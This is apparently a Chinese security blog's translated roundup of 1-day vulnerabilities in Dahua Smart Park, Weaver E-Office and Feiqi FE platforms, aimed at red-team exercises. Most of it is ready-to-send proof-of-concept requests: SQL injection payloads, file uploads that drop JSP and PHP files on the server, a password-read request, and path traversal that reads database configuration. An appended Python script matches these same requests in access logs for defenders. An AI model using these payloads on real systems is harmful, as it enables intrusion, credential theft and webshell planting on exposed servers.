HW Intelligence - 2023-08-17 - 1day Roundup

月影
2023-08-17 / 0 comments / 51 views

Dahua Smart Park arbitrary password read attack

GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1

Dahua Smart Park Integrated Management Platform searchJson SQL injection vulnerability

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate

Dahua Smart Park Integrated Management Platform file upload vulnerability

POST /publishing/publishing/material/file/video HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--

Dahua Smart Park Integrated Management Platform getFaceCapture SQL injection vulnerability

This PoC comes from: https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa
Extraction code: zyxa
See the link for details.

POC:
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D

Dahua Smart Park Integrated Management Platform video arbitrary file upload vulnerability

This PoC comes from: https://pan.baidu.com/s/1wZoSo30EXiw9vMQBPtKFWg?pwd=zyxa
Extraction code: zyxa
See the link for details.

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"

Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--

Path of the uploaded file:
/publishingImg/VIDEO/230812152005170200.jsp

Weaver HrmCareerApplyPerView SQL injection vulnerability

GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

Weaver ShowDocsImage SQL injection vulnerability

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

Weaver E-Office 9 pre-auth (front-end) file inclusion

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

Weaver E-Office uploadify.php back-end (authenticated) file upload vulnerability

PoC from: https://mp.weixin.qq.com/s/kgEec5abI13lmgh4rtH6Qw

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 259
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Accept-Encoding: gzip

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
Content-Type: image/jpeg

<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>
--e64bdf16c554bbc109cecef6451c26a4--

Path of the uploaded file:
/attachment/3466744850/xxx.php

Weaver E-Office 9 file upload vulnerability CVE-2023-2523 POC

POST /Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

Weaver E-Office 9 file upload vulnerability CVE-2023-2648 POC

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octetstream

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

Weaver E-Office 9.0 file upload

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--


POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

飞企互联 (Feiqi Internet) FE Business Collaboration Platform imagePath parameter file read vulnerability

Vulnerability description:
The FE office collaboration platform is an information management platform covering application development, operation, management and maintenance. The 飞企互联 FE Business Collaboration Platform has a file read vulnerability; an attacker can use it to read important system files and obtain large amounts of sensitive information.
Affected: 飞企互联 FE Business Collaboration Platform
Fingerprint (cyberspace search):
"flyrise.stopBackspace.js"

Verification PoC:
/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
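A defender-side check for this roundup, added here and not part of the original post: the Python below scans web-server access-log lines (Combined Log Format) for the request paths and payload markers listed above (the getFaceCapture updatexml injection, the video and uploadify.php upload endpoints and the paths the dropped .jsp/.php files are fetched from, the HrmCareerApplyPerView union query, and the ShowImageServlet traversal). The rule names and the sample log lines are my own constructions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Aug/2023:10:01:02 +0800] "GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Aug/2023:10:01:09 +0800] "POST /publishing/publishing/material/file/video HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Aug/2023:10:01:11 +0800] "GET /publishingImg/VIDEO/230812152005170200.jsp HTTP/1.1" 200 32 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Aug/2023:10:02:30 +0800] "GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,3 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Aug/2023:10:03:01 +0800] "GET /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Aug/2023:10:03:05 +0800] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 200 40 "-" "test"
10.0.0.9 - - [17/Aug/2023:10:03:06 +0800] "GET /attachment/3466744850/xxx.php HTTP/1.1" 200 27 "-" "test"
192.168.1.20 - - [17/Aug/2023:10:04:00 +0800] "GET /portal/index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each rule: (name, required method or None, predicate over the decoded, lower-cased target).
RULES = [
    ("dahua-getfacecapture-sqli", "GET", lambda t: "/getfacecapture/" in t and "updatexml(" in t),
    ("dahua-video-upload", "POST", lambda t: t.startswith("/publishing/publishing/material/file/video")),
    ("dahua-publishingimg-jsp", "GET", lambda t: t.startswith("/publishingimg/") and t.split("?")[0].endswith(".jsp")),
    ("weaver-hrmcareerapply-sqli", "GET", lambda t: "hrmcareerapplyperview.jsp" in t and "union select" in t),
    ("weaver-uploadify-upload", "POST", lambda t: t.startswith("/inc/jquery/uploadify/uploadify.php")),
    ("weaver-attachment-php", "GET", lambda t: re.match(r"/attachment/\d+/[^/?]+\.php", t) is not None),
    ("fe-showimageservlet-traversal", "GET", lambda t: "/servlet/showimageservlet" in t and "../" in t),
]

def normalize(target):
    """URL-decode twice (to catch double encoding), collapse whitespace and lower-case."""
    t = unquote(unquote(target))
    return re.sub(r"\s+", " ", t).lower()

def scan(log_text):
    """Return (rule_name, client_ip, raw_target) for every log line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        t = normalize(m["target"])
        for name, method, pred in RULES:
            if (method is None or m["method"] == method) and pred(t):
                hits.append((name, m["ip"], m["target"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs do not carry the multipart body, so the upload rules key on the endpoint and on the later request for the dropped .jsp/.php path; tune the rules against your own baseline traffic before alerting on them.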
